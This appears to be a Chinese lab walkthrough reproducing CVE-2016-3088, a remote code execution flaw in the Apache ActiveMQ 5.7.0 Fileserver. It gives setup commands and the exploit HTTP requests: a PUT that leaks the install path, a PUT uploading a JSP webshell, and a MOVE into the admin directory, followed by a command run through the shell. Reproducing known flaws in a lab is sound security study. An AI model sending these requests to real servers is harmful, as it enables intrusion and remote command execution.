漏洞编码:CVE-2016-3088

实验环境:Linux

Apache ActiveMQ版本号:Apache ActiveMQ 5.7.0

---------------------------------------------------------------------

首先下载安装包

wget http://archive.apache.org/dist/activemq/apache-activemq/5.7.0/apache-activemq-5.7.0-bin.tar.gz

解压后打开bin目录

启动apache activemq

./activemq start

检验是否运行

netstat -an | grep 61616

【漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

如果61616端口开放了就说明运行成功。

然后进入http://xxx.xxx.xxx.xxx:8161/

【漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

 

漏洞利用

1、 获取物理路径

PUT /fileserver/%20/%20 HTTP/1.1

 

发送数据包

【漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

2、再利用PUT上传一个Jsp的马到 fileserver 目录

PUT /fileserver/1.jsp HTTP/1.1 

 

【漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

遇到这种情况不用担心,只是该目录没有执行的权限罢了。

解决方法看漏洞三

3、利用 MOVE 方法将 Webshell 移入 admin/ 目录(也可以利用相对路径)

MOVE /fileserver/1.jsp  HTTP/1.0
Destination:file:///root/apache-activemq-5.7.0/webapps/admin/1.jsp

 

【漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

然后访问http://xxx.xxx.xxx.xxx:8161/admin/1.jsp?cmd=id

【漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)

成功执行了命令

 

漏洞原文:https://www.seebug.org/vuldb/ssvid-96268

相关文章:

  • 2021-06-26
  • 2022-03-01
  • 2022-03-13
  • 2021-12-13
  • 2021-11-18
  • 2021-12-09
  • 2021-07-28
猜你喜欢
  • 2021-07-24
  • 2021-04-14
  • 2022-12-23
  • 2021-05-16
  • 2021-05-25
  • 2021-11-29
相关资源
相似解决方案